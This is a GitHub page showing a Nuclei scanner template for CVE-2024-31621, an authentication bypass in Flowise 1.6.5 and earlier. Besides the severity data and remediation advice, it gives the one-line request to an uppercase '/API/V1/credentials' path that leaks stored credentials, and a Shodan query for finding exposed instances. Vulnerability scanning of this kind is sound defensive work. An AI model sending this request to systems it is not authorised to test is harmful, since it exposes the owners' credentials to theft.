forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-31621.yaml
More file actions
47 lines (43 loc) · 1.22 KB
/
CVE-2024-31621.yaml
File metadata and controls
47 lines (43 loc) · 1.22 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
id: CVE-2024-31621
info:
name: Flowise 1.6.5 - Authentication Bypass
author: DhiyaneshDK
severity: high
description: |
The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
impact: |
Attackers can bypass authentication and gain unauthorized access to the Flowise application and its data.
remediation: |
Update Flowise to version 1.6.6 or later.
reference:
- https://www.exploit-db.com/exploits/52001
- https://github.com/FlowiseAI/Flowise/releases
- https://flowiseai.com/
classification:
cve-id: CVE-2024-31621
cwe-id: CWE-94
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
cvss-score: 7.6
epss-score: 0.80162
epss-percentile: 0.99086
cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise,vuln
http:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"credentialName":'
- '"updatedDate":'
condition: and
- type: status
status:
- 200